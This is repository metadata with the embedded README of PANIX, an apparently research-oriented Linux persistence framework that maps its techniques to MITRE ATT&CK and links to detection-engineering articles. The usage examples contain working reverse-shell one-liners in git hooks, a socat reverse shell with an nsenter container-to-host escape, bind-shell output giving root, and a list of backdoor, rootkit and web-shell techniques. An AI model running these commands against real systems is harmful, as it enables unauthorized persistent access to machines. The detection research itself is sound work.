{"id":14350149,"url":"https://github.com/Aegrah/PANIX","last_synced_at":"2025-08-21T02:33:03.770Z","repository":{"id":248877575,"uuid":"802847910","full_name":"Aegrah/PANIX","owner":"Aegrah","description":"Customizable Linux Persistence Tool for Security Research and Detection Engineering.","archived":false,"fork":false,"pushed_at":"2024-08-25T15:50:52.000Z","size":201,"stargazers_count":316,"open_issues_count":3,"forks_count":29,"subscribers_count":7,"default_branch":"main","last_synced_at":"2024-08-25T17:01:49.081Z","etag":null,"topics":["bash","detection-engineering","linux","panix","persistence","security-research","shell","unix"],"latest_commit_sha":null,"homepage":"https://www.rgrosec.com/","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Aegrah.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-05-19T12:37:40.000Z","updated_at":"2024-08-25T16:02:37.000Z","dependencies_parsed_at":"2024-08-25T17:05:56.220Z","dependency_job_id":null,"html_url":"https://github.com/Aegrah/PANIX","commit_stats":null,"previous_names":["aegrah/alpha","aegrah/panix"],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aegrah%2FPANIX","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aegrah%2FPANIX/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aegrah%2FPANIX/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aegrah%2FPANIX/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Aegrah","download_url":"https://codeload.github.com/Aegrah/PANIX/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":217116707,"owners_count":16127263,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bash","detection-engineering","linux","panix","persistence","security-research","shell","unix"],"created_at":"2024-08-27T04:00:38.826Z","updated_at":"2025-08-21T02:33:03.762Z","avatar_url":"https://github.com/Aegrah.png","language":"Shell","readme":"\u003cp align=\"center\"\u003e\n \u003cimg src=\"https://github.com/user-attachments/assets/92536790-efb0-44c0-8d53-fc8b0d1e8683\" alt=\"PANIX logo\"width=\"1010\" height=\"750\"\u003e \n \u003ch1 align=\"center\"\u003e\u003ca href=\"https://github.com/Aegrah/PANIX/\"\u003ePANIX - Persistence Against *NIX\u003c/a\u003e\u003c/h1\u003e\n\u003c/p\u003e\n\n![](https://i.imgur.com/waxVImv.png)\n\nPANIX is a powerful, modular, and highly customizable Linux persistence framework designed for security researchers, detection engineers, penetration testers, CTF enthusiasts, and more. Built with versatility in mind, PANIX emphasizes functionality, making it an essential tool for understanding and implementing a wide range of persistence techniques.\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Features\nPANIX provides a versatile suite of features for simulating and researching Linux persistence mechanisms.\n\n| **Feature** | **Description** |**Root**|**User**|\n|----------------------------------|-----------------------------------------------------------------------------------------|--------|--------|\n| **At Job Persistence** | Implements persistence by adding entries to system jobs. | ✅ | ✅ |\n| **Authorized Keys** | Adds a public key to the authorized_keys file for SSH access. | ✅ | ✅ |\n| **Backdoor User** | Creates a backdoor user with `UID=0` (root privileges). | ✅ | ❌ |\n| **Backdoor System User** | Backdoor a system user (SSH access to news/nobody). | ✅ | ❌ |\n| **Backdoored /etc/passwd** | Directly adds a malicious user entry to `/etc/passwd`. | ✅ | ❌ |\n| **Backdoored /etc/init.d** | Establishes persistence via SysVinit (`/etc/init.d`). | ✅ | ❌ |\n| **Backdoored /etc/rc.local** | Establishes persistence via run control (`/etc/rc.local`). | ✅ | ❌ |\n| **Bind Shell** | Runs a pre-compiled/LOLBin bind shell for remote access. | ✅ | ✅ |\n| **Capabilities Backdoor** | Adds specific capabilities to binaries to maintain persistence. | ✅ | ❌ |\n| **Cron Job Persistence** | Sets up cron jobs to ensure persistence across reboots. | ✅ | ✅ |\n| **Create User** | Creates a new user account on the system. | ✅ | ❌ |\n| **D-Bus Backdoor** | Creates a D-Bus service for root reverse shell access. | ✅ | ❌ |\n| **Diamorphine Rootkit** | Installs the Diamorphine Loadable Kernel Module Rootkit. | ✅ | ❌ |\n| **Initramfs Persistence** | Injects a UID=0 backdoor user into initramfs on reboot. | ✅ | ❌ |\n| **Git Persistence** | Utilizes Git hooks or pagers to persist within Git repositories. | ✅ | ✅ |\n| **Generator Persistence** | Leverages systemd generators to create persistent services. | ✅ | ❌ |\n| **GRUB Backdoor** | Manipulates GRUB to execute a backdoor at boot. | ✅ | ❌ |\n| **Malicious Container** | Deploys a Docker container designed to host escape. | ✅ | ✅ |\n| **Malicious Package** | Installs a `DPKG/RPM` package to achieve persistence. | ✅ | ❌ |\n| **NetworkManager** | Installs a dispatcher script to persist upon network actions. | ✅ | ❌ |\n| **LD_PRELOAD Backdoor** | Uses `LD_PRELOAD` to inject malicious libraries for persistence. | ✅ | ❌ |\n| **LKM Backdoor** | Loads a Loadable Kernel Module to maintain persistence. | ✅ | ❌ |\n| **MOTD Backdoor** | Alters Message of the Day (MOTD) to establish persistence. | ✅ | ❌ |\n| **Package Manager** | Manipulates `APT/YUM/DNF` to establish persistence on usage. | ✅ | ❌ |\n| **PAM Persistence** | Installs a PAM backdoor using a rogue module or pam_exec. | ✅ | ❌ |\n| **Password Change** | Changes user passwords to secure backdoor accounts. | ✅ | ❌ |\n| **Polkit Backdoor** | Creates an overly permissive Polkit configuration backdoor. | ✅ | ❌ |\n| **Reverse Shell** | Establishes a reverse shell (supporting multiple LOLBins). | ✅ | ✅ |\n| **Shell Profile Persistence** | Modifies shell profiles to execute scripts upon user login. | ✅ | ✅ |\n| **SSH Key Persistence** | Manipulates SSH keys to maintain persistent access via SSH. | ✅ | ✅ |\n| **Sudoers Backdoor** | Alters the `/etc/sudoers` file to grant elevated privileges. | ✅ | ❌ |\n| **SUID Backdoor** | Backdoors binaries by setting the SUID bit. | ✅ | ❌ |\n| **System Binary Backdoor** | Wraps system binaries to include backdoor functionality. | ✅ | ❌ |\n| **Systemd Service** | Creates systemd services that ensure persistence on reboot. | ✅ | ✅ |\n| **Udev Persistence** | Utilizes drivers to persist at the hardware interaction level. | ✅ | ❌ |\n| **Web Shell Persistence** | Deploys web servers for remote access via web interfaces. | ✅ | ✅ |\n| **XDG Autostart** | Employs XDG autostart directories to persist upon user login. | ✅ | ✅ |\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Support\nPANIX offers comprehensive support across various Linux distributions.\n\n| **Distribution** | **Support** | **Tested Version** |\n|------------------|-----------|------------------------------------------------------------------|\n| **Debian** | ✅ | Debian 11 \u0026 12 |\n| **Ubuntu** | ✅ | Ubuntu 22.04 (Diamorphine unavailable) |\n| **RHEL** | ✅ | RHEL 9 (MOTD \u0026 Pre-OS Boot techniques unavailable) |\n| **CentOS** | ✅ | CentOS Stream 9 \u0026 7 (MOTD \u0026 Pre-OS Boot techniques unavailable) |\n| **Fedora** | ✅ | Not fully tested |\n| **Arch Linux** | ✅ | Not fully tested |\n| **OpenSUSE** | ✅ | Not fully tested |\n\nCustom or outdated Linux distributions may have different configurations or lack specific features, causing mechanisms to fail on untested versions. If a default command fails, use the `--custom` flag available in most features to adjust paths and commands for your environment. Review and modify the script to suit your needs if that doesn't resolve the issue.\n\n**Contributions via pull requests or issues for new features, updates, or ideas are always welcome!**\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Repository Structure\nThe PANIX repository is designed for modularity, maintainability, and ease of extension. Each persistence mechanism includes setup and revert scripts, simplifying management, and removal.\n\n```plaintext\nPANIX/\n├── main.sh # Core logic and argument parsing.\n├── modules/ # Persistence mechanism scripts.\n│ ├── common.sh # Shared functions.\n│ ├── setup_*.sh # Setup scripts.\n│ └── revert/ # Revert scripts.\n├── build.sh # Builds the distributable script.\n├── panix.sh # Final distributable script.\n└── README.md # Documentation.\n```\n\n## Key Benefits\n- **Paired Setup \u0026 Revert**: Every `setup_*.sh` has a corresponding `revert_*.sh`, ensuring easy removal of persistence mechanisms.\n- **Modular Design**: Easily modify existing modules or add new ones without affecting the core script.\n- **Simple Expansion**: To add new functionality:\n 1. Create a new `setup_*.sh` in `modules/`.\n 2. Add a corresponding `revert_*.sh` in `modules/revert/`.\n 3. Update `main.sh` to include the new scripts.\n 4. Update `common.sh` to include the module in the help menu.\n 4. Run `build.sh` to generate the updated `panix.sh`.\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Getting Started\nGetting PANIX up and running is as simple as downloading the script from the [release page](https://github.com/Aegrah/PANIX/releases/tag/panix-v2.1.0) and executing it:\n```\ncurl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash\n```\nOr download it and execute it manually:\n```\n# Download through curl or wget\ncurl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh -o panix.sh\nwget https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh -O panix.sh\n\n# Grant execution permissions and execute the script.\nchmod +x panix.sh\n./panix.sh\n```\n\nExecuting the script will either show the `root` or `user` help menu, depending on the privileges the current user has.\n\n```\npanix@panix-demo:~$ sudo ./panix.sh\n __\n|__) /\\ |\\ | | \\_/\n| /~~\\ | \\| | / \\\n\n@RFGroenewoud\n\nRoot User Options:\n\n --at At job persistence\n --authorized-keys Add public key to authorized keys\n --backdoor-user Create backdoor user\n --backdoor-system-user Create backdoor system user\n --bind-shell Execute backgrounded bind shell\n --cap Add capabilities persistence\n --create-user Create a new user\n --cron Cron job persistence\n --dbus D-Bus service persistence\n --generator Generator persistence\n --git Git hook/pager persistence\n --grub GRUB bootloader persistence\n --initd SysV Init (init.d) persistence\n --initramfs Initramfs persistence \n --ld-preload LD_PRELOAD backdoor persistence\"\n --lkm Loadable Kernel Module (LKM) persistence\n --malicious-container Docker container with host escape\"\n --malicious-package Build and Install a package for persistence (DPKG/RPM)\n --motd Message Of The Day (MOTD) persistence (not available on RHEL derivatives)\n --network-manager NetworkManager dispatcher script persistence\n --package-manager Package Manager persistence (APT/YUM/DNF)\n --pam Pluggable Authentication Module (PAM) persistence (backdoored PAM \u0026 pam_exec)\n --passwd-user Add user to /etc/passwd directly\n --password-change Change user password\n --polkit Allow pkexec as any user through Polkit\n --rc-local Run Control (rc.local) persistence\n --reverse-shell Reverse shell persistence (supports multiple LOLBins)\"\n --rootkit Diamorphine (LKM) rootkit persistence \n --shell-profile Shell profile persistence\n --ssh-key SSH key persistence\n --sudoers Sudoers persistence\n --suid SUID persistence\n --system-binary System binary persistence\n --systemd Systemd service persistence\n --udev Udev (driver) persistence\n --web-shell Web shell persistence (PHP/Python)\n --xdg XDG autostart persistence\n --revert Revert changes made by PANIX' default options\n --mitre-matrix Display the MITRE ATT\u0026CK Matrix for PANIX\n --quiet (-q) Quiet mode (no banner)\n```\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Examples\nThe script should be largely self-explanatory, however, this section will show a few examples of how to work with PANIX.\n\n## Help Menu\nEvery persistence mechanism has a separate help menu:\n\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --udev --help\nUsage: ./panix.sh --udev [OPTIONS]\n--examples Display command examples\n-default Use default udev settings\n --ip \u003cip\u003e Specify IP address\n --port \u003cport\u003e Specify port number\n --sedexp | --at | --cron | --systemd Specify the mechanism to use\n--custom Use custom udev settings\n --command \u003ccommand\u003e Specify custom command\n --path \u003cpath\u003e Specify custom path\n--help|-h Show this help message\n```\n\nEvery persistence mechanism also has an `--examples` flag that shows default and custom examples, aiding in crafting the command that works for you.\n\n```\nruben@ubuntu2204:~$ ./panix.sh --git --examples\nExamples:\n--default:\n./panix.sh --git --default --ip 10.10.10.10 --port 1337 --hook|--pager\n\n--custom:\n./panix.sh --git --custom --command \"(nohup setsid /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/10.10.10.10/1337 0\u003e\u00261' \u003e /dev/null 2\u003e\u00261 \u0026) \u0026\" --path \"gitdir/.git/hooks/pre-commit\" --hook\n\n./panix.sh --git --custom --command \"nohup setsid /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/10.10.10.10/1337 0\u003e\u00261' \u003e /dev/null 2\u003e\u00261 \u0026 ${PAGER:-less}\" --path \"~/.gitconfig --pager\"\n```\n\n## Execution\nMost of the persistence mechanisms are very simple, and will (hopefully) not require much explanation. For example, systemd persistence can be set up simply through executing:\n\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --systemd --default --ip 10.10.10.10 --port 1337\nService file created successfully!\nTimer file created successfully!\nCreated symlink /etc/systemd/system/timers.target.wants/dbus-org.freedesktop.resolved.timer → /usr/local/lib/systemd/system/dbus-org.freedesktop.resolved.timer.\n[+] Systemd service persistence established!\n```\nWhen setting up a persistence mechanism, the script will let you know whether it worked, and in cases where information is needed to work with the persistence mechanism, additional information is provided. For example the bind shell mechanism:\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --bind-shell --default --architecture x64\n[+] Bind shell binary /tmp/bd64 created and executed in the background.\n[+] The bind shell is listening on port 9001.\n[+] To interact with it from a different system, use: nc -nv \u003cIP\u003e 9001\n[+] Bind shell persistence established!\n```\nAllowing you to interact with the bind shell:\n```\n❯ nc -nv 192.168.211.130 9001\n(UNKNOWN) [192.168.211.130] 9001 (?) open\nwhoami\nroot\n```\nThe same goes for mechanisms that have additional built-in features such as the Docker persistence mechanism, with a built-in root host escape:\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --malicious-container --ip 192.168.211.131 --port 330\n[+] Building 10.4s (9/9) FINISHED docker:default\n =\u003e [internal] load build definition from Dockerfile 0.0s\n =\u003e =\u003e transferring dockerfile: 722B 0.0s\n =\u003e [internal] load metadata for docker.io/library/alpine:latest 2.1s\n =\u003e [internal] load .dockerignore 0.0s\n =\u003e =\u003e transferring context: 2B 0.0s\n =\u003e [1/5] FROM docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 0.8s\n =\u003e =\u003e resolve docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 0.0s\n =\u003e =\u003e sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 1.85kB / 1.85kB 0.0s\n =\u003e =\u003e sha256:dabf91b69c191a1a0a1628fd6bdd029c0c4018041c7f052870bb13c5a222ae76 528B / 528B 0.0s\n =\u003e =\u003e sha256:a606584aa9aa875552092ec9e1d62cb98d486f51f389609914039aabd9414687 1.47kB / 1.47kB 0.0s\n =\u003e =\u003e sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99 3.62MB / 3.62MB 0.4s\n =\u003e =\u003e extracting sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99 0.2s\n =\u003e [2/5] RUN apk add --no-cache bash socat sudo util-linux procps 4.4s\n =\u003e [3/5] RUN adduser -D lowprivuser 0.6s\n =\u003e [4/5] RUN echo '#!/bin/bash' \u003e /usr/local/bin/entrypoint.sh \u0026\u0026 echo 'while true; do /bin/bash -c \"socat exec:\\\"/bin/bash\\\",pty,stderr,setsid,sigint,sane tcp:192.168.211.131:330\" 0.8s\n =\u003e [5/5] RUN echo '#!/bin/bash' \u003e /usr/local/bin/escape.sh \u0026\u0026 echo 'sudo nsenter -t 1 -m -u -i -n -p -- su -' \u003e\u003e /usr/local/bin/escape.sh \u0026\u0026 chmod +x /usr/local/bin/escape.sh \u0026\u0026 ec 0.8s\n =\u003e exporting to image 0.6s\n =\u003e =\u003e exporting layers 0.6s\n =\u003e =\u003e writing image sha256:b36eb0d13ee1a0c57c3e6a1ee0255ef474986f44d65b177c539b2ffb1d248790 0.0s\n =\u003e =\u003e naming to docker.io/library/malicious-container 0.0s\n86ce6b00e872bb8c21d0dae21e747e830bb70b44ab7946558e563bf7f4b626ef\n[+] Persistence through malicious Docker container complete.\n[+] To escape the container with root privileges, run '/usr/local/bin/escape.sh'.\n```\nWhich shows you exactly how to escape the container, and get access to the host.\n```\n❯ nc -nvlp 330\nlistening on [any] 330 ...\nconnect to [192.168.211.131] from (UNKNOWN) [192.168.211.130] 43400\n86ce6b00e872:/$ /usr/local/bin/escape.sh\n/usr/local/bin/escape.sh\nroot@ubuntu2204:~#\n```\n\n## Revert Mechanism\nPANIX can clean its mess through the `--revert` command. Both for seperate modules:\n\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --revert rootkit\n\n######################### [+] Reverting rootkit module... ######################### \n\n[+] Sending 'kill -63 0' to unload the rootkit module... \n[+] Signal sent successfully.\n[+] Identifying loaded rootkit kernel modules in /dev/shm/.rk...\n[+] Unloading rootkit rkit... \n[+] Kernel module 'rkit' unloaded successfully.\n[+] Rootkit rkit unloaded successfully.\n[+] Removing kernel module files from /dev/shm/.rk...\n[+] Removed file: /dev/shm/.rk/restore_rkit.ko\n[+] Removed directory: /dev/shm/.rk\n[+] Removing downloaded files in /tmp...\n[-] Directory not found: /tmp/diamorphine\n[-] File not found: /tmp/diamorphine.zip\n[+] Removed file: /tmp/diamorphine.tar\n[-] Directory not found: /tmp/Diamorphine.git\n[+] Reloading kernel modules...\n[+] Kernel modules reloaded successfully.\n```\n\nAnd for all modules:\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --revert all\n\n[+] Running full reversion with --revert-all...\n[+] Reverting all modules...\n\n######################### [+] Reverting revert_at... #########################\n\nError: 'at' binary is not present. Cannot revert 'at' jobs.\n[-] Failed to revert revert_at. Exit Code: 1\n\n######################### [+] Reverting revert_authorized_keys... #########################\n\n[-] Backup file /root/.ssh/authorized_keys.bak not found. No changes made.\n[+] revert_authorized_keys reverted successfully.\n\n######################### [+] Reverting revert_backdoor_user... #########################\n\n[+] No backdoor users found.\n[+] revert_backdoor_user reverted successfully.\n\n######################### [+] Reverting revert_bind_shell... #########################\n\n[+] Searching for bind shell processes and killing them if present...\n[+] revert_bind_shell reverted successfully.\n\n[...]\n\n[+] Reversion of all modules complete.\n```\n\n## MITRE ATT\u0026CK Matrix\nPANIX has a built-in MITRE ATT\u0026CK matrix that displays the techniques and sub-techniques available. \n\n```\nruben@ubuntu2204:~$ ./panix.sh --mitre-matrix\n\nMITRE ATT\u0026CK Matrix - Persistence Techniques Supported by PANIX\n\nPersistence Method Technique Name Technique ID Sub-technique Name Sub-technique ID URL \n------------------- -------------- ------------- ----------------- --------------- --------------------------------------------- \n--at Scheduled Task T1053 At T1053.002 https://attack.mitre.org/techniques/T1053/002\n--authorized-keys Account Manipulation T1098 SSH Authorized Keys T1098.004 https://attack.mitre.org/techniques/T1098/004\n--backdoor-user Create Account T1136 Local Account T1136.001 https://attack.mitre.org/techniques/T1136/001\n--backdoor-system-user Account Manipulation T1098 SSH Authorized Keys T1098.004 https://attack.mitre.org/techniques/T1098/004\n--bind-shell Command and Scripting Interpreter T1059 Unix Shell T1059.004 https://attack.mitre.org/techniques/T1059/004\n--cap Abuse Elevation Control Mechanism T1548 N/A N/A https://attack.mitre.org/techniques/T1548\n--create-user Create Account T1136 Local Account T1136.001 https://attack.mitre.org/techniques/T1136/001\n--cron Scheduled Task T1053 Cron T1053.003 https://attack.mitre.org/techniques/T1053/003\n--dbus Create or Modify System Process T1543 N/A N/A https://attack.mitre.org/techniques/T1543\n--generator Create or Modify System Process T1543 Systemd Service T1543.002 https://attack.mitre.org/techniques/T1543/002\n--git Event Triggered Execution T1546 N/A N/A https://attack.mitre.org/techniques/T1546\n--grub Pre-OS Boot T1542 N/A N/A https://attack.mitre.org/techniques/T1542\n--initd Boot or Logon Initialization Scripts T1037 N/A N/A https://attack.mitre.org/techniques/T1037\n--initramfs Pre-OS Boot T1542 N/A N/A https://attack.mitre.org/techniques/T1542\n--ld-preload Hijack Execution Flow T1574 Dynamic Linker Hijacking T1574.006 https://attack.mitre.org/techniques/T1574/006\n--lkm Boot or Logon Autostart Execution T1547 Kernel Modules and Extensions T1547.006 https://attack.mitre.org/techniques/T1547/006\n--malicious-container Escape to Host T1610 N/A N/A https://attack.mitre.org/techniques/T1610\n--malicious-package Event Triggered Execution T1546 Installer Packages T1546.016 https://attack.mitre.org/techniques/T1546/016\n--motd Boot or Logon Initialization Scripts T1037 N/A N/A https://attack.mitre.org/techniques/T1037\n--network-manager Event Triggered Execution T1546 N/A N/A https://attack.mitre.org/techniques/T1546\n--package-manager Event Triggered Execution T1546 Installer Packages T1546.016 https://attack.mitre.org/techniques/T1546/016\n--pam Modify Authentication Process T1556 Pluggable Authentication Modules T1556.003 https://attack.mitre.org/techniques/T1556/003\n--passwd-user Account Manipulation T1098 N/A N/A https://attack.mitre.org/techniques/T1098\n--password-change Account Manipulation T1098 N/A N/A https://attack.mitre.org/techniques/T1098\n--polkit Modify Authentication Process T1556 N/A N/A https://attack.mitre.org/techniques/T1556\n--rc-local Boot or Logon Initialization Scripts T1037 RC Scripts T1037.004 https://attack.mitre.org/techniques/T1037/004\n--reverse-shell Command and Scripting Interpreter T1059 Unix Shell T1059.004 https://attack.mitre.org/techniques/T1059/004\n--rootkit Rootkit T1014 N/A N/A https://attack.mitre.org/techniques/T1014\n--shell-profile Event Triggered Execution T1546 Unix Shell Configuration Modification T1546.004 https://attack.mitre.org/techniques/T1546/004\n--ssh-key Account Manipulation T1098 SSH Authorized Keys T1098.004 https://attack.mitre.org/techniques/T1098/004\n--sudoers Abuse Elevation Control Mechanism T1548 Sudo and Sudo Caching T1548.003 https://attack.mitre.org/techniques/T1548/003\n--suid Abuse Elevation Control Mechanism T1548 Setuid and Setgid T1548.001 https://attack.mitre.org/techniques/T1548/001\n--system-binary Compromise Host Software Binary T1554 N/A N/A https://attack.mitre.org/techniques/T1554\n--systemd Create or Modify System Process T1543 Systemd Service T1543.002 https://attack.mitre.org/techniques/T1543/002\n--udev Event Triggered Execution T1546 Udev Rules T1546.017 https://attack.mitre.org/techniques/T1546/017\n--web-shell Server Software Component T1505 Web Shell T1505.003 https://attack.mitre.org/techniques/T1505/003\n--xdg Boot or Logon Autostart Execution T1547 XDG Autostart Entries T1547.013 https://attack.mitre.org/techniques/T1547/013 \n\nLegend:\nTechnique: High-level MITRE ATT\u0026CK technique.\nSub-Technique: Specific sub-technique under a high-level technique.\nN/A: No specific sub-technique defined for this method.\nURL: Link to the official MITRE ATT\u0026CK page for further details.\n```\n\n![](https://i.imgur.com/waxVImv.png)\n# Publications and Resources\nPublications in which PANIX is leveraged:\n\n- [Linux Detection Engineering - A Primer on Persistence Mechanisms](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms) \n- [Linux Detection Engineering - A Sequel on Persistence Mechanisms](https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms)\n- [Linux Detection Engineering - A Continuation on Persistence Mechanisms](https://www.elastic.co/security-labs/continuation-on-persistence-mechanisms)\n- [Linux Detection Engineering - Approaching the Summit on Persistence Mechanisms](https://www.elastic.co/security-labs/approaching-the-summit-on-persistence)\n- [Linux Detection Engineering - The Grand Finale on Linux Persistence Mechanisms](https://www.elastic.co/security-labs/the-grand-finale-on-linux-persistence)\n\nFeel free to check out my socials for updates on (Linux) security research.\n\n\u003cp align=\"left\"\u003e\n\u003ca href=\"https://twitter.com/RFGroenewoud\"\u003e\u003cimg src=\"https://img.shields.io/badge/%E2%9C%A8-Twitter%20-0a0a0a.svg?style=flat\u0026colorA=0a0a0a\" alt=\"Twitter\"/\u003e\u003c/a\u003e\n\u003ca href=\"https://www.linkedin.com/in/ruben-groenewoud/\"\u003e\u003cimg src=\"https://img.shields.io/badge/%E2%9C%A8-LinkedIn-0a0a0a.svg?style=flat\u0026colorA=0a0a0a\" alt=\"LinkedIn\"/\u003e\u003c/a\u003e\n\u003ca href=\"https://www.rgrosec.com/\"\u003e\u003cimg src=\"https://img.shields.io/badge/%E2%9C%A8-Blog-0a0a0a.svg?style=flat\u0026colorA=0a0a0a\" alt=\"Blog\"/\u003e\u003c/a\u003e\n\u003ca href=\"https://github.com/Aegrah\"\u003e\u003cimg src=\"https://img.shields.io/badge/%E2%9C%A8-GitHub-0a0a0a.svg?style=flat\u0026colorA=0a0a0a\" alt=\"GitHub\"/\u003e\u003c/a\u003e\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Share\nBy sharing [PANIX](https://github.com/Aegrah/PANIX), you can assist others in testing and improving their security posture and support the development of new detection capabilities in Linux security.\n\n[![GitHub Repo stars](https://img.shields.io/badge/share%20on-reddit-red?logo=reddit)](https://reddit.com/submit?url=[https://github.com/Aegrah/PANIX](https://github.com/Aegrah/PANIX)\u0026title=Persistence%20Against%20UNIX%20\\(PANIX\\))\n[![GitHub Repo stars](https://img.shields.io/badge/share%20on-hacker%20news-orange?logo=ycombinator)](https://news.ycombinator.com/submitlink?u=https://github.com/Aegrah/PANIX)\n[![GitHub Repo stars](https://img.shields.io/badge/share%20on-twitter-03A9F4?logo=twitter)](https://twitter.com/share?url=https://github.com/Aegrah/PANIX\u0026text=Persistence%20Against%20UNIX%20\\(PANIX\\))\n[![GitHub Repo stars](https://img.shields.io/badge/share%20on-facebook-1976D2?logo=facebook)](https://www.facebook.com/sharer/sharer.php?u=https://github.com/Aegrah/PANIX)\n[![GitHub Repo stars](https://img.shields.io/badge/share%20on-linkedin-3949AB?logo=linkedin)](https://www.linkedin.com/shareArticle?url=https://github.com/Aegrah/PANIX\u0026title==Persistence%20Against%20UNIX%20\\(PANIX\\))\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Disclaimer\nPANIX is intended for authorized security testing and research purposes only. Misuse of this tool for malicious activities is not condoned and is entirely at the user's own risk. By using PANIX, you agree that you are responsible for your own actions. Just don't do stupid stuff.\n","funding_links":[],"categories":["Shell","Recently Updated","Detection Testing"],"sub_categories":["[Aug 26, 2024](/content/2024/08/26/README.md)","Linux"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAegrah%2FPANIX","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FAegrah%2FPANIX","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAegrah%2FPANIX/lists"}